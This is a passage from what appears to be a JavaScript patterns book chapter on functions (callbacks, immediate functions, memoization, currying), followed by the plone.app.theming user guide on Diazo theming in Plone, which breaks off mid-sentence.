find Nodes(), and its task would be to crawl the DOM tree of a page and return an array of page elements that are interesting to you: var findNodes = function () { var i = 100000, // big, heavy loop nodes = [], // stores the result found; // the next node found while (i) { i -= 1; // complex logic here... nodes.push(found); } return nodes; }; It’s a good idea to keep this function generic and have it simply return an array of DOM nodes, without doing anything with the actual elements. The logic of modifying nodes could be in a different function, for example a function called hide() which, as the name suggests, hides the nodes from the page: var hide = function (nodes) { var i = 0, max = nodes.length; for (; i < max; i += 1) { nodes[i].style.display = "none"; } }; // executing the functions hide(findNodes()); This implementation is inefficient, because hide() has to loop again through the array of nodes returned by findNodes(). It would be more efficient if you could avoid this loop and hide the nodes as soon as you select them in findNodes(). But if you implement the hiding logic in findNodes(), it will no longer be a generic function because of the coupling of the retrieval and modification logic. Enter the callback pattern—you pass your node hiding logic as a callback function and delegate its execution: // refactored findNodes() to accept a callback var findNodes = function (callback) { var i = 100000, nodes = [], found; // check if callback is callable if (typeof callback !== "function") { callback = false; } while (i) { i -= 1; // complex logic here... // now callback: if (callback) { callback(found); } nodes.push(found); } return nodes; }; The implementation is straightforward; the only additional task that findNodes() performs is checking if an optional callback has been provided, and if so, executing it. The callback is optional, so the refactored findNodes() can still be used as before and won’t break the old code that relies on the old API. The hide() implementation will be much simpler now because it doesn’t need to loop through nodes: // a callback function var hide = function (node) { node.style.display = "none"; }; // find the nodes and hide them as you go findNodes(hide); The callback can be an existing function as shown in the preceding code, or it can be an anonymous function, which you create as you call the main function. For example, here’s how you can show nodes using the same generic findNodes() function: // passing an anonymous callback findNodes(function (node) { node.style.display = "block"; }); In the previous examples, the part where the callback is executed was like so: callback(parameters); Although this is simple and will be good enough in many cases, there are often scenarios where the callback is not a one-off anonymous function or a global function, but it’s a method of an object. If the callback method uses this to refer to the object it belongs to, this can cause unexpected behavior. Imagine the callback is the function paint(), which is a method of the object called myapp: var myapp = {}; myapp.color = "green"; myapp.paint = function (node) { node.style.color = this.color; }; The function findNodes() does something like this: var findNodes = function (callback) { // ... if (typeof callback === "function") { callback(found); } // ... }; If you call findNodes(myapp.paint), it won’t work as expected, because this.color will not be defined. The object this will refer to the global object because findNodes() is invoked as a function, not as a method. If findNodes() was defined as a method of an object called dom (like dom. find Nodes()), then this inside of the callback would refer to dom instead of the expected myapp. The solution to this problem is to pass the callback function and in addition pass the object this callback belongs to: findNodes(myapp.paint, myapp); Then you also need to modify findNodes() to bind that object you pass: var findNodes = function (callback, callback_obj) { //... if (typeof callback === "function") { callback.call(callback_obj, found); } // ... }; There will be more on the topics of binding and using call() and apply() in future chapters. Another option for passing an object and a method to be used as a callback is to pass the method as a string, so you don’t repeat the object twice. In other words: findNodes(myapp.paint, myapp); can become: findNodes("paint", myapp); Then findNodes() would do something along these lines: var findNodes = function (callback, callback_obj) { if (typeof callback === "string") { callback = callback_obj[callback]; } //... if (typeof callback === "function") { callback.call(callback_obj, found); } // ... }; The callback pattern has many everyday uses; for example, when you attach an event listener to an element on a page, you’re actually providing a pointer to a callback function that will be called when the event occurs. Here’s a simple example of how console. log() is passed as a callback when listening to the document’s click event: document.addEventListener("click", console.log, false); Most of the client-side browser programming is event-driven. When the page is done loading, it fires a load event. Then the user interacts with the page and causes various events to fire, such as click, keypress, mouseover, mousemove, and so on. JavaScript is especially suited for event-driven programming, because of the callback pattern, which enables your programs to work asynchronously, in other words, out of order. “Don’t call us, we’ll call you” is a famous phrase in Hollywood, where many candidates audition for the same role in a movie. It would be impossible for the casting crew to answer phone calls from all the candidates all the time. In the asynchronous event-driven JavaScript, there is a similar phenomenon. Only instead of giving your phone number, you provide a callback function to be called when the time is right. You may even provide more callbacks than needed, because certain events may never happen. For example, if the user never clicks “Buy now!” then your function that validates the credit card number format will never be called back. Another example of the callback pattern in the wild is when you use the timeout methods provided by the browser’s window object: setTimeout() and setInterval(). These methods also accept and execute callbacks: var thePlotThickens = function () { console.log('500ms later...'); }; setTimeout(thePlotThickens, 500); Note again how the function thePlotThickens is passed as a variable, without parentheses, because you don’t want it executed right away, but simply want to point to it for later use by setTimeout(). Passing the string "thePlotThickens()" instead of a function pointer is a common antipattern similar to eval(). The callback is a simple and powerful pattern, which can come in handy when you’re designing a library. The code that goes into a software library should be as generic and reusable as possible, and the callbacks can help with this generalization. You don’t need to predict and implement every feature you can think of, because it will bloat the library, and most of the users will never need a big chunk of those features. Instead, you focus on core functionality and provide “hooks” in the form of callbacks, which will allow the library methods to be easily built upon, extended, and customized. Functions are objects, so they can be used as return values. This means that a function doesn’t need to return some sort of data value or array of data as a result of its execution. A function can return another more specialized function, or it can create another function on-demand, depending on some inputs. Here’s a simple example: A function does some work, probably some one-off initialization, and then works on its return value. The returned value happens to be another function, which can also be executed: var setup = function () { alert(1); return function () { alert(2); }; }; // using the setup function var my = setup(); // alerts 1 my(); // alerts 2 Because setup() wraps the returned function, it creates a closure, and you can use this closure to store some private data, which is accessible by the returned function but not to the outside code. An example would be a counter that gives you an incremented value every time you call it: var setup = function () { var count = 0; return function () { return (count += 1); }; }; // usage var next = setup(); next(); // returns 1 next(); // 2 next(); // 3 Functions can be defined dynamically and can be assigned to variables. If you create a new function and assign it to the same variable that already holds another function, you’re overwriting the old function with the new one. In a way, you’re recycling the old function pointer to point to a new function. And all this can happen inside the body of the old function. In this case the function overwrites and redefines itself with a new implementation. This probably sounds more complicated than it is; let’s take a look at a simple example: var scareMe = function () { alert("Boo!"); scareMe = function () { alert("Double boo!"); }; }; // using the self-defining function scareMe(); // Boo! scareMe(); // Double boo! This pattern is useful when your function has some initial preparatory work to do and it needs to do it only once. Because there’s no reason to do repeating work when it can be avoided, a portion of the function may no longer be required. In such cases, the self-defining function can update its own implementation. Using this pattern can obviously help with the performance of your application, because your redefined function simply does less work. Another name for this pattern is “lazy function definition,” because the function is not properly defined until the first time it’s used and it is being lazy afterwards, doing less work. A drawback of the pattern is that any properties you’ve previously added to the original function will be lost when it redefines itself. Also if the function is used with a different name, for example, assigned to a different variable or used as a method of an object, then the redefinition part will never happen and the original function body will be executed. Let’s see an example where the scareMe() function is used in a way that a first-class object would be used: A new property is added. The function object is assigned to a new variable. The function is also used as a method. Consider the following snippet: // 1. adding a new property scareMe.property = "properly"; // 2. assigning to a different name var prank = scareMe; // 3. using as a method var spooky = { boo: scareMe }; // calling with a new name prank(); // "Boo!" prank(); // "Boo!" console.log(prank.property); // "properly" // calling as a method spooky.boo(); // "Boo!" spooky.boo(); // "Boo!" console.log(spooky.boo.property); // "properly" // using the self-defined function scareMe(); // Double boo! scareMe(); // Double boo! console.log(scareMe.property); // undefined As you can see, the self-definition didn’t happen as you probably expected when the function was assigned to a new variable. Every time prank() was called, it alerted “Boo!” At the same time it overwrote the global scareMe() function, but prank() itself kept seeing the old definition including the property property. The same happened when the function was used as the boo() method of the spooky object. All these invocations kept rewriting the global scareMe() pointer so that when it was eventually called, it had the updated body alerting “Double boo” right from the first time. It was also no longer able to see scareMe.property. The immediate function pattern is a syntax that enables you to execute a function as soon as it is defined. Here’s an example: (function () { alert('watch out!'); }()); This pattern is in essence just a function expression (either named or anonymous), which is executed right after its creation. The term immediate function is not defined in the ECMAScript standard, but it’s short and helps describe and discuss the pattern. The pattern consists of the following parts: You define a function using a function expression. (A function declaration won’t work.) You add a set of parentheses at the end, which causes the function to be executed immediately. You wrap the whole function in parentheses (required only if you don’t assign the function to a variable). The following alternative syntax is also common (note the placement of the closing parentheses), but JSLint prefers the first one: (function () { alert('watch out!'); })(); This pattern is useful because it provides a scope sandbox for your initialization code. Think about the following common scenario: Your code has to perform some setup tasks when the page loads, such as attaching event handlers, creating objects, and so on. All this work needs to be done only once, so there’s no reason to create a reusable named function. But the code also requires some temporary variables, which you won’t need after the initialization phase is complete. It would be a bad idea to create all those variables as globals. That’s why you need an immediate function—to wrap all your code in its local scope and not leak any variables in the global scope: (function () { var days = ['Sun', 'Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat'], today = new Date(), msg = 'Today is ' + days[today.getDay()] + ', ' + today.getDate(); alert(msg); }()); // "Today is Fri, 13" If this code weren’t wrapped in an immediate function, then the variables days, today, and msg would all be global variables, leftovers from the initialization code. You can also pass arguments to immediate functions, as the following example demonstrates: // prints: // I met Joe Black on Fri Aug 13 2010 23:26:59 GMT-0800 (PST) (function (who, when) { console.log("I met " + who + " on " + when); }("Joe Black", new Date())); Commonly, the global object is passed as an argument to the immediate function so that it’s accessible inside of the function without having to use window: this way makes the code more interoperable in environments outside the browser: (function (global) { // access the global object via `global` }(this)); Note that in general you shouldn’t pass too many parameters to an immediate function, because it could quickly become a burden to constantly scroll to the top and to the bottom of the function to understand how it works. Just like any other function, an immediate function can return values and these return values can be assigned to variables: var result = (function () { return 2 + 2; }()); Another way to achieve the same is to omit the parentheses that wrap the function, because they are not required when you assign the return value of an immediate function to a variable. Omitting the first set of parentheses gives you the following: var result = function () { return 2 + 2; }(); This syntax is simpler, but it may look a bit misleading. Failing to notice the () at the end of the function, someone reading the code might think that result points to a function. Actually result points to the value returned by the immediate function, in this case the number 4. Yet another syntax that accomplishes the same results is: var result = (function () { return 2 + 2; })(); The previous examples returned a primitive integer value as the result of executing the immediate function. But instead of a primitive value, an immediate function can return any type of value, including another function. You can then use the scope of the immediate function to privately store some data, specific to the inner function you return. In the next example, the value returned by the immediate function is a function, which will be assigned to the variable getResult and will simply return the value of res, a value that was precomputed and stored in the immediate function’s closure: var getResult = (function () { var res = 2 + 2; return function () { return res; }; }()); Immediate functions can also be used when you define object properties. Imagine you need to define a property that will likely never change during the life of the object, but before you define it a bit of work needs to be performed to figure out the right value. You can use an immediate function to wrap that work and the returned value of the immediate function will become the value of the property. The following code shows an example: var o = { message: (function () { var who = "me", what = "call"; return what + " " + who; }()), getMsg: function () { return this.message; } }; // usage o.getMsg(); // "call me" o.message; // "call me" In this example, o.message is a string property, not a function, but it needs a function, which executes while the script is loading and which helps define the property. The immediate function pattern is widely used. It helps you wrap an amount of work you want to do without leaving any global variables behind. All the variables you define will be local to the self-invoking functions and you don’t have to worry about polluting the global space with temporary variables. Other names for the immediate function pattern include “self-invoking” or “self-executing” function, because the function executes itself as soon as it’s defined. This pattern is also often used in bookmarklets, because bookmarklets run on any page and keeping the global namespace clean (and your bookmarklet code unobtrusive) is critical. The pattern also enables you to wrap individual features into self-contained modules. Imagine your page is static and works fine without any JavaScript. Then, in the spirit of progressive enhancement, you add a piece of code that enhances the page somehow. You can wrap this code (you can also call it a “module” or a “feature”) into an immediate function and make sure the page works fine with and without it. Then you can add more enhancements, remove them, split-test them, allow the user to disable them, and so on. You can use the following template to define a piece of functionality; let’s call it module1: // module1 defined in module1.js (function () { // all the module 1 code ... }()); Following the same template, you can code your other modules. Then when it’s time for releasing the code to the live site, you decide which features are ready for prime time and merge the corresponding files using your build script. Another way to protect from global scope pollution, similar to the immediate functions pattern previously described, is the following immediate object initialization pattern. This pattern uses an object with an init() method, which is executed immediately after the object is created. The init() function takes care of all initialization tasks. Here’s an example of the immediate object pattern: ({ // here you can define setting values // a.k.a. configuration constants max_width: 600, max_height: 400, // you can also define utility methods gimmeMax: function () { return this.max_width + "x" + this.max_height; }, // initialize init: function () { console.log(this.gimmeMax()); // more init tasks... } }).init(); In terms of syntax, you approach this pattern as if you’re creating a normal object using the object literal. You also wrap the literal in parentheses (grouping operator), which instructs the JavaScript engine to treat the curly braces as an object literal, not as a code block. (It’s not an if or a for loop.) After you close the parentheses, you invoke the init() method immediately. You can also wrap the object and the init() invocation into grouping parentheses instead of wrapping the object only. In other words, both of these work: ({...}).init(); ({...}.init()); The benefits of this pattern are the same as the immediate function pattern: you protect the global namespace while performing the one-off initialization tasks. It may look a little more involved in terms of syntax compared to just wrapping a bunch of code in an anonymous function, but if your initialization tasks are more complicated (as they often are) it adds structure to the whole initialization procedure. For example, private helper functions are clearly distinguishable because they are properties of the temporary object, whereas in an immediate function pattern, they are likely to be just functions scattered around. A drawback of this pattern is that most JavaScript minifiers may not minify this pattern as efficiently as the code simply wrapped into a function. The private properties and methods will not be renamed to shorter names because, from a minifier’s point of view, it’s not trivial to do so safely. At the moment of writing, Google’s Closure Compiler in “advanced” mode is the only minifier that renames the immediate object’s properties to shorter names, turning the preceding example into something like: ({d:600,c:400,a:function(){return this.d+"x"+this.c},b:function(){console.log(this. a())}}).b(); This pattern is mainly suitable for one-off tasks, and there’s no access to the object after the init() has completed. If you want to keep a reference to the object after it is done, you can easily achieve this by adding return this; at the end of init(). Init-time branching (also called load-time branching) is an optimization pattern. When you know that a certain condition will not change throughout the life of the program, it makes sense to test the condition only once. Browser sniffing (or feature detection) is a typical example. For example, after you’ve sniffed that XMLHttpRequest is supported as a native object, there’s no chance that the underlying browser will change in the middle of your program execution and all of a sudden you’ll need to deal with ActiveX objects. Because the environment doesn’t change, there’s no reason for your code to keep sniffing (and reaching the same conclusion) every time you need another XHR object. Figuring out the computed styles of a DOM element or attaching event handlers are other candidates that can benefit from the init-time branching pattern. Most developers have coded—at least once in their client-side programming life—a utility with methods for attaching and removing event listeners, like in the following example: // BEFORE var utils = { addListener: function (el, type, fn) { if (window.addEventListener) { el.addEventListener(type, fn, false); } else if (document.attachEvent) { // IE el.attachEvent('on' + type, fn); } else { // older browsers el['on' + type] = fn; } }, removeListener: function (el, type, fn) { // pretty much the same... } }; The problem with this code is that it’s a bit inefficient. Every time you call utils. add Listener() or utils.removeListener(), the same checks get executed over and over again. Using init-time branching, you sniff the browser features once, during the initial loading of the script. At that time you redefine how the function will work throughout the lifespan of the page. The following is an example of how you can approach this task: // AFTER // the interface var utils = { addListener: null, removeListener: null }; // the implementation if (window.addEventListener) { utils.addListener = function (el, type, fn) { el.addEventListener(type, fn, false); }; utils.removeListener = function (el, type, fn) { el.removeEventListener(type, fn, false); }; } else if (document.attachEvent) { //; }; } Here is the moment to mention a word of caution against browser sniffing. When you use this pattern, don’t over-assume browser features. For example, if you’ve sniffed that the browser doesn’t support window.addEventListener, don’t just assume the browser you’re dealing with is IE and it doesn’t support XMLHttpRequest natively either, although it was true at some point in the browser’s history. There might be cases in which you can safely assume that features go together, such as .addEventListener and .remove Event Listener, but in general browser features change independently. The best strategy is to sniff features separately and then use load-time branching to do the sniffing only once. Functions are objects, so they can have properties. In fact, they do have properties and methods out-of-the-box. For example, every function, no matter what syntax you use to create it, automatically gets a length property containing the number of arguments the function expects: function func(a, b, c) {} console.log(func.length); // 3 You can add custom properties to your functions at any time. One use case for custom properties is to cache the results (the return value) of a function, so the next time the function is called, it doesn’t have to redo potentially heavy computations. Caching the results of a function is also known as memoization. In the following example, the function myFunc creates a property cache, accessible as usual via myFunc.cache. The cache property is an object (a hash) where the parameter param passed to the function is used as a key and the result of the computation is the value. The result can be any complicated data structure you might need: var myFunc = function (param) { if (!myFunc.cache[param]) { var result = {}; // ... expensive operation ... myFunc.cache[param] = result; } return myFunc.cache[param]; }; // cache storage myFunc.cache = {}; The preceding code assumes that the function takes only one argument param and it’s a primitive data type (such as a string). If you have more parameters and more complex ones, a generic solution would be to serialize them. For example, you can serialize the arguments object as a JSON string and use that string as a key in your cache object: var myFunc = function () { var cachekey = JSON.stringify(Array.prototype.slice.call(arguments)), result; if (!myFunc.cache[cachekey]) { result = {}; // ... expensive operation ... myFunc.cache[cachekey] = result; } return myFunc.cache[cachekey]; }; // cache storage myFunc.cache = {}; Be aware that in serialization, the “identify” of the objects is lost. If you have two different objects that happen to have the same properties, both will share the same cache entry. Another way to write the previous function is to use arguments.callee to refer to the function instead of hardcoding the function name. Although this is currently possible, be aware that arguments.callee is not allowed in ECMAScript 5 strict mode: var myFunc = function (param) { var f = arguments.callee, result; if (!f.cache[param]) { result = {}; // ... expensive operation ... f.cache[param] = result; } return f.cache[param]; }; // cache storage myFunc.cache = {}; The configuration object pattern is a way to provide cleaner APIs, especially if you’re building a library or any other code that will be consumed by other programs. It’s a fact of life that software requirements change as the software is developed and maintained. It often happens that you start working with some requirements in mind, but more functionality gets added afterward. Imagine you’re writing a function called addPerson(), which accepts a first and last name and adds a person to a list: function addPerson(first, last) {...} Later you learn that actually the date of birth needs to be stored, too, and optionally the gender and the address. So you modify the function adding the new parameters (carefully putting the optional parameters at the end of the list): function addPerson(first, last, dob, gender, address) {...} At this point the signature of this function is already getting a little longer. And then you learn you need to add a username and it’s absolutely required, not optional. Now the caller of the function will have to pass even the optional parameters and be careful not to mix the order of the parameters: addPerson("Bruce", "Wayne", new Date(), null, null, "batman"); Passing a large number of parameters is not convenient. A better approach is to substitute all the parameters with only one and make it an object; let’s call it conf, for “configuration”: addPerson(conf); Then the user of the function can do: var conf = { username: "batman", first: "Bruce", last: "Wayne" }; addPerson(conf); The pros of the configuration objects are: No need to remember the parameters and their order You can safely skip optional parameters Easier to read and maintain Easier to add and remove parameters The cons of the configuration objects are: You need to remember the names of the parameters Property names cannot always be safely minified, especially by simpler minifiers This pattern could be useful when your function creates DOM elements, for example, or in setting the CSS styles of an element, because elements and styles can have a great number of mostly optional attributes and properties. The rest of the chapter discusses the topic of currying and partial function application. But before we dive into this topic, let’s first see what exactly function application means.!" alien alien.sayHi.apply(alien, ["humans"]); // "Hello, humans!" alien.sayHi.call(alien, "humans"); // "Hello, humans!". Currying has nothing to do with the spicy Indian dish; it comes from the name of the mathematician Haskell Curry. (The Haskell programming language is also named after him.) Currying is a transformation process—we transform a function. An alternative name for currying could be schönfinkelisation, after the name of another mathematician, Moses Schönfinkel, the original inventor of this transformation. So how do we schönfinkelify (or schönfinkelize or curry) a function?. In JavaScript the knowledge and proper use of functions is critical. This chapter discussed the background and terminology related to functions. You learned about the two important features of functions in JavaScript, namely: Functions are first-class objects; they can be passed around as values and augmented with properties and methods. Functions provide local scope, which other curly braces do not. Also something to keep in mind is that declarations of local variables get hoisted to the top of the local scope. The syntax for creating functions includes: Named function expressions Function expressions (the same as the above, but missing a name), also known as anonymous functions Function declarations, similar to the function syntax in other languages After covering the background and syntax of functions, you learned about a number of useful patterns, which can be grouped into the following categories: API patterns, which help you provide better and cleaner interfaces to your functions. These patterns include: Pass a function as an argument Help keep the number of arguments to a function under control When the return value of one function is another function When new functions are created based on existing ones plus a partial list of arguments Initialization patterns, which help you perform initialization and setup tasks (very common when it comes to web pages and applications) in a clearer, structured way without polluting the global namespace with temporary variables. These include: Executed as soon as they are defined Initialization tasks structured in an anonymous object that provides a method to be called immediately Helps branch code only once during initial code execution, as opposed to many times later during the life of the application Performance patterns, which help speed up the code. These include: Using function properties so that computed values are not computed again Overwrite themselves with new bodies to do less work from the second invocation and after No credit card required
https://www.safaribooksonline.com/library/view/javascript-patterns/9781449399115/ch04.html
CC-MAIN-2018-09
refinedweb
6,769
50.97
plone.app.theming 1.2.7 Integrates the Diazo theming engine with Plone This package offers a simple way to develop and deploy Plone themes using the Diazo theming engine. If you are not familiar with Diazo, check out the Diazo documentation. This version of plone.app.theming ships with Plone version 4.3 or later. It comes with a user guide, reproduced below, available through the theming control panel. plone.app.theming manual This guide provides an overview of Diazo theming in Plone versions 4.3 and higher. Contents - Introduction - What is a Diazo theme? - Using the control panel - Reference - 1.2.7 (2015-07-18) - 1.2.6 (2015-06-05) - 1.2.5 (2015-05-13) - 1.2.4 (2015-05-12) - 1.2.3 (2015-05-04) - 1.2.2 (2015-03-22) - 1.2.1 (2014-10-23) - 1.2.0 (2014-03-02) - 1.1.1 (2013-05-23) - 1.1 (2013-04-06) - 1.1b2 (2013-01-01) - 1.1b1 (2012-10-16) - 1.1a2 (2012-08-30) - 1.1a1 (2012-08-08) - 1.0 (2012-04-15) - 1.0b9 - 2011-11-02 - 1.0b8 - 2011-07-04 - 1.0b7 - 2011-06-12 - 1.0b6 - 2011-06-08 - 1.0b5 - 2011-05-29 - 1.0b4 - 2011-05-24 - 1.0b3 - 2011-05-23 - 1.0b2 - 2011-05-16 - 1.0b1 - 2011-04-22 Introduction In Plone versions 4.3 and higher you can edit your website theme through web browser in Plone’s site setup control panel. Only HTML, CSS and little XML knowledge needed as the prerequisitements. This guide explains how to use this feature of Plone. See introduction video to plone.app.theming. What is a Diazo theme? A “theme” makes a website (in this case, one powered by Plone) take on a particular look and feel. Diazo (formerly known as XDV) is a technology that can be used to theme websites. It is not specific to Plone per se, but has been created by the Plone community and, as of Plone 4.3, provides the default way to apply a theme to a Plone site. You can learn more about Diazo at. Diazo themes may be a little different to themes you have created in other systems, and indeed to themes you may have created for earlier versions of Plone. A Diazo theme is really about transforming some content - in this case the output from “vanilla” Plone - into a different set of HTML markup by applying a set of rules to combine a static HTML mock-up of the end result you want with the dynamic content coming from Plone. In comparison, the previous way to theme a Plone site (like the way many other content management systems are themed) relies on selectively overriding the templates and scripts that Plone uses to build a page with custom versions that produce different HTML markup. The latter approach can be more powerful, certainly, but also requires much deeper knowledge of Plone’s internals and command of server-side technologies such as Zope Page Templates and even Python. Diazo themes, by contrast, are easy to understand for web designers and non- developers alike. A Diazo theme consists of three elements: One or more HTML mockups, also referred to as theme files, that represent the desired look and feel. These will contain placeholders for content that is to be provided by the Plone content management system. Mockups usually reference CSS, JavaScript and image files by relative path. The most common way to create a theme is to use desktop software like Dreamweaver or a text editor to create the relevant markup, styles and scripts, and test the theme locally in a web browser. The content that is being themed. In this case, that is the output from Plone. A rules file, which defines how the placeholders in the theme (i.e. the HTML mockup) should be replaced by relevant markup in the content. The rules file uses XML syntax (similar to HTML). Here is a very simple example: <?xml version="1.0" encoding="UTF-8"?> <rules xmlns="" xmlns:` <theme href="theme.html" /> <replace css: </rules> Here, we are replacing the contents (child nodes) of a placeholder element with HTML id main in the theme file (theme.html, found in the same directory as the rules.xml file, as referenced by the <theme /> rule) with the contents (children) of the element with the HTML id content in the markup generated by Plone. When this theme is applied, the result will look very much like the static HTML file theme.html (and its referenced CSS, JavaScript and image files), except the placeholder that is identified by the node in the theme with id main will be filled by Plone’s main content area. Plone ships with an example theme called, appropriately, Example theme, which uses the venerable Twitter Bootstrap to build a simple yet functional theme exposing most of Plone’s core functionality. You are advised to study it - in particular the rules.xml file - to learn more about how Diazo themes work. Using the control panel After installation of the Diazo theme support package in a Plone site, the Theming control panel will appear in Plone’s Site setup. The main tab of this control panel, Themes, will show all available themes, with buttons to activate/deactivate, modify, copy or delete each, as well as buttons to create new themes or bring up this help text. Click on a theme preview image to open a preview of that theme in a new tab or window. The preview is navigable, but form submissions and some advanced features will not work. Selecting a theme To apply an existing theme, simply click the Activate button underneath the theme preview. The currently active theme will be highlighted in yellow. If you deactivate the currently active theme, no Diazo theme will be applied, i.e. “vanilla” Plone theming will apply. Note: The Theming control panel is never theemd, ensuring that you can always deactivate an errant theme that could render the control panel unusable. Thus, you may not see any difference immediately after enabling a theme. Simply navigate to another page in the Plone site, though, and you should see the theme applied. Creating a new theme New themes can be created in one of two ways: - Click the New theme button at the top of the Themes tab in the Theming control panel and enter a title and description in the form that appears. A bare-bones theme will be created, and you will be taken to the Modify theme screen (see below), where you can edit or create theme and rules files. - Click the Copy button underneath any existing theme and enter a title and description in the form that appears. A new theme will be created as a copy of the existing theme, and you will be taken to the Modify theme (see below), where you can edit or create theme and rules files. Uploading an existing theme Themes can be distributed as Zip files, containing the HTML mockup and rules file. To download an existing theme, click the Download button underneath the theme on the Themes tab of the Theming control panel. To upload such a Zip file into another site, use the Upload Zip file button on the Themes tab of the Theming control panel. You can choose whether or not to replace any existing theme with the same name (based on the name of the top-level directory contained within the Zip file). You can also upload a Zip file of a static HTML mockup that does not contain a rules file, such as a design provided by a Plone-agnostic web designer. In this case, a basic rules.xml file will be added for you to start building up a theme from using the Modify theme screen (see below). The generated rules file will assume the main HTML mockup file is called index.html, but you can change this in rules.xml. Once you have successfully uploaded a theme Zip file, you will be taken to the Modify theme screen (see below), where you can edit or create theme files. Hint: If you get an error message like “The uploaded file does not contain a valid theme archive”, this usually means that you have uploaded a Zip file that contains multiple files and folders, rather than a single top level folder with all the theme resources in it. This could happen if you compressed a theme or HTML mockup by adding its files and folders directly a Zip archive, rather than compressing the directory in which they were found. To fix this, simply unzip the archive on your computer into a new directory, move up a level, and compress this directory on its own into a new Zip file, which you can then upload. Modifying the theme You can modify a theme by clicking Modify theme underneath a theme in the Themes tab of the Theming control panel. This screen is also launched automatically when you create or upload a new theme. Note: Only themes created or uploaded through the Theming control panel can be modified through Plone. Themes installed by third-party add-ons or distributed on the filesystem cannot, although changes made on the filesystem will be reflected immediately if Zope is running in debug mode. To modify a filesystem theme, you can copy it to a new in-Plone theme by clicking the Copy button underneath the theme in the Theming control panel. The Modify theme screen initially shows a file manager, with a file tree on the left and an editor on the right. Click on a file in the file tree to open an editor or preview: HTML, CSS, JavaScript and other text files can be edited directly through the editor. Other files (e.g. images) will be rendered as a preview. Note: The advanced editor with syntax highlighting is not available in Microsoft Internet Explorer. Click New folder to create a new folder. You can also right-click on a folder in the file tree to bring up this action. Click New file to create a new text file. You can also right-click on a folder in the file tree to bring up this action. Click Upload file to upload a file from your computer. You can also right- click on a folder in the file tree to bring up this action. Click Preview theme to preview the theme as it will be applied with the mockup and rules as currently saved. The preview is navigable, but forms and certain advanced features will not work. To save the file currently being edited, click the Save file button, or use the keyboard shortcut Ctrl+S (Windows/Linux) or Cmd+S (Mac). To rename or delete a file or folder, right-click on it in the file tree and select the appropriate action. The theme inspector The theme inspector provides an advanced interface for discovering and building up the rules of a Diazo theme. It can be launched by clicking the Show inspectors button on the Modify theme screen for in-Plone themes, or by clicking the Inspect theme button underneath a filesystem theme on the Themes tab of the Theming control panel. The theme inspector consists of two panels: - The HTML mockup. If there are several HTML files in the theme, you can switch between them using the drop-down list underneath the HTML mockup panel. - The Unthemed content. This shows Plone without any theme applied. Either panel can be maximised by clicking the arrows icon at the top right of either. The HTML mockups and Unthemed content panels can be switch to source view, showing their underlying HTML markup, by clicking the tags icon at the top right of either. As you hover over elements in the HTML mockup or Unthemed content panels, you will see: - An outline showing the element under the cursor. - A CSS or XPath selector in the status bar at the bottom if the panel which would uniquely identify this element in a Diazo rule. Click on an element or press Enter whilst hovering oveer an element to select it. The most recently selected element in each panel is shown in the bottom right of the relevant status bar. Press Esc whilst hovering over an element to select its parent. This is useful when trying to select “invisible” container elements. Press Enter to save this selection. The contents of the HTML mockup or (more commonly) Unthemed content panels can be navigated, for example to get to a content page that requires specific theme rules, by disabling the inspector. Use the toggle switches at the bottom right of the relevant panel to enable or disable the selector. The rule builder Click the Build rule button near the top of the Modify theme or Inspect theme screen to launch an interactive rule building wizard. You will be asked which type of rule to build, and then prompted to select the relevant elements in the HTML mockup and/or Unthemed content panels as required. By default, this will use any saved selections, unless you untick the Use selected elements box on the first page if the wizard. Once the wizard completes, you will be shown the generated rule. You can edit this if you wish. If you click Insert, the newly generated rule will be inserted into the rules.xml editor at or near your current cursor position. You can move it around or edit it further as you wish. Click Preview theme to preview the theme in a new tab or window. Don’t forget to save the rules.xml file if you have made changes. Note: In readonly mode, you can build rules and inspect the HTML mockup and theme, but not change the rules.xml file. In this case, the Insert button of the rule builder (see below) will not be available either. Note: The ability to insert rules from the Build rule wizard are not available in Microsoft Internet Explorer, although you will be given the option to copy the rule to the clipboard when using this browser. Advanced settings The Theming control panel also contains a tab named Advanced settings. Here be dragons. The Advanced setings tab is divided into two areas. The first, Theme details, contains the underlying settings that are modified when a theme is applied from the Themes control panel. These are: - Whether or not Diazo themes are enabled at all. - The path to the rules file, conventionally called rules.xml, either relative to the Plone site root or as an absolute path to an external server. - The prefix to apply when turning relative paths in themes (e.g. references to images in an <img /> tag’s src attribute) into absolute ones at rendering time. - The HTML DOCTYPE to apply to the rendered output, if different to the default XHTML 1.0 Transitional. - Whether or not to allow theme resources (likes rules.xml) to be read from the network. Disabling this gives a modest performance boost. - A list of host names for which a theme is never applied. Most commonly, this contains 127.0.0.1, allowing you to view an unthemed site through and a themed one at during development, say. - A list of theme parameters and the TALES expressions to generate them (see below). The second, Theme base, controls the presentation of the unthemed content, and apply even if no Diazo theme is being applied. These are the settings that used to be found in the Themes control panel in previous versions of Plone. Reference The remainder of this guide contains reference materials useful for theme builders. Deploying and testing themes To build and test a theme, you must first create a static HTML mockup of the look and feel you want, and then build a rules file to describe how Plone’s content maps to the placeholders in this mockup. The mockup can be created anywhere using whatever tool you feel most comfortable building web pages in. To simplify integration with Plone, you are recommended to make sure it uses relative links for resources like CSS, JavaScript and image files, so that it will render properly when opened in a web browser from a local file. Plone will convert these relative links to the appropriate absolute paths automatically, ensuring the theme works no matter which URL the user is viewing when the theme is applied to a Plone site. There are several ways to get the theme into Plone: On the filesystem If you used an installer or a standard “buildout” to set up your Plone site, you should have a directory called resources in the root of your Plone installation (this is created using the resources option to the buildout recipe plone.recipe.zope2instance. See for more details.) You can find (or create) a theme directory inside this directory, which is used to contain themes. Each theme needs its own directory with a unique name. Create one (e.g. resources/theme/mytheme) and put your HTML files and any references resources inside this directory. You can use subdirectories if you wish, but you are recommended to keep the basic theme HTML files at the top of the theme directory. You will also need a rules file called rules.xml inside this directory. If you haven’t got one yet, start with an empty one: <?xml version="1.0" encoding="UTF-8"?> <rules xmlns="" xmlns:` <theme href="theme.html" /> <replace css: </rules> Provided you are running Zope in debug mode (e.g. you start it up with bin/instance fg), changes to the theme and rules should take effect immediately. You can preview or enable the theme through the Themes control panel, and then iteratively modify the rules.xml file or the theme mockup as you wish. Through the web If you prefer (or do not have filesystem access), you can create themes entirely through the Plone control panel, either by duplicating an existing theme, or starting from scratch with a near-empty theme. See the instructions on using the control panel above for more details. Once a theme has been created, you can modify it through the Theming control panel. See above for more details. As a zip file Themes can be downloaded from Plone as Zip files, which can then be uploaded into other sites. See the instructions on using the control panel above for more details. In fact, you can create valid theme zip archives by compressing a theme directory on the filesystem using a standard compression tool such as 7-Zip or Winzip (for Windows) or the built-in Compress action in the Mac OS X Finder. Just make sure you compress 